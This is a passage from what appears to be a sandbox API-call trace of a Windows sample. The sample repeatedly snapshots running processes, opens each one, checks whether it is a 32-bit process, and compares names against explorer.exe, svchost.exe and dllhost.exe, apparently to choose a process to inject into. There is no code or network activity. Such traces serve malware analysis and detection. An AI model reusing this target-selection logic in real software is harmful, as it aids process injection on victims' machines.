cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0197.411] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0197.412] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.412] CloseHandle (hObject=0xd8) returned 1 [0197.412] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0197.412] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0197.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0197.412] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.412] CloseHandle (hObject=0xd8) returned 1 [0197.412] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0197.412] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0197.412] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0197.412] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0197.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0197.413] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0197.413] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.414] CloseHandle (hObject=0xd8) returned 1 [0197.414] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0197.488] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.488] CloseHandle (hObject=0xd8) returned 1 [0197.488] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0197.488] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0197.488] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.488] CloseHandle (hObject=0xd8) returned 1 [0197.488] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.489] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0197.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0197.489] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0197.490] CloseHandle (hObject=0xd8) returned 1 [0197.490] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0197.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0197.490] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0197.491] CloseHandle (hObject=0xd4) returned 1 [0197.491] Sleep (dwMilliseconds=0x3e8) [0198.531] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0198.534] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0198.534] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0198.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0198.535] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0198.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0198.535] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0198.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0198.536] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0198.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0198.536] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0198.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0198.537] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0198.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0198.537] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0198.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0198.538] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0198.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0198.538] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0198.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0198.539] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0198.540] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0198.540] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0198.541] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0198.541] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0198.542] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0198.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0198.542] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0198.543] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0198.543] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0198.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0198.544] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.544] CloseHandle (hObject=0xd8) returned 1 [0198.544] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0198.544] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0198.544] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0198.544] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0198.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0198.544] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0198.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0198.545] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.545] CloseHandle (hObject=0xd8) returned 1 [0198.545] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0198.545] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0198.545] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0198.545] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0198.546] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0198.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0198.546] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0198.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0198.547] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.547] CloseHandle (hObject=0xd8) returned 1 [0198.547] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0198.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0198.547] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.547] CloseHandle (hObject=0xd8) returned 1 [0198.547] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0198.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0198.548] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.548] CloseHandle (hObject=0xd8) returned 1 [0198.548] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0198.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0198.548] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.549] CloseHandle (hObject=0xd8) returned 1 [0198.549] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0198.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0198.549] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.549] CloseHandle (hObject=0xd8) returned 1 [0198.549] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0198.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0198.550] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.550] CloseHandle (hObject=0xd8) returned 1 [0198.550] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0198.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0198.551] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.551] CloseHandle (hObject=0xd8) returned 1 [0198.551] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0198.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0198.551] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.551] CloseHandle (hObject=0xd8) returned 1 [0198.551] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0198.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0198.552] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.552] CloseHandle (hObject=0xd8) returned 1 [0198.552] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0198.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0198.552] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.552] CloseHandle (hObject=0xd8) returned 1 [0198.552] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0198.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0198.553] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.553] CloseHandle (hObject=0xd8) returned 1 [0198.553] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0198.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0198.554] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.554] CloseHandle (hObject=0xd8) returned 1 [0198.554] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0198.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0198.554] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.554] CloseHandle (hObject=0xd8) returned 1 [0198.554] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0198.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0198.555] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.555] CloseHandle (hObject=0xd8) returned 1 [0198.555] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0198.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0198.555] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.555] CloseHandle (hObject=0xd8) returned 1 [0198.555] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0198.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0198.556] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.556] CloseHandle (hObject=0xd8) returned 1 [0198.556] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0198.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0198.557] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.557] CloseHandle (hObject=0xd8) returned 1 [0198.557] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0198.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0198.557] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.557] CloseHandle (hObject=0xd8) returned 1 [0198.557] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, 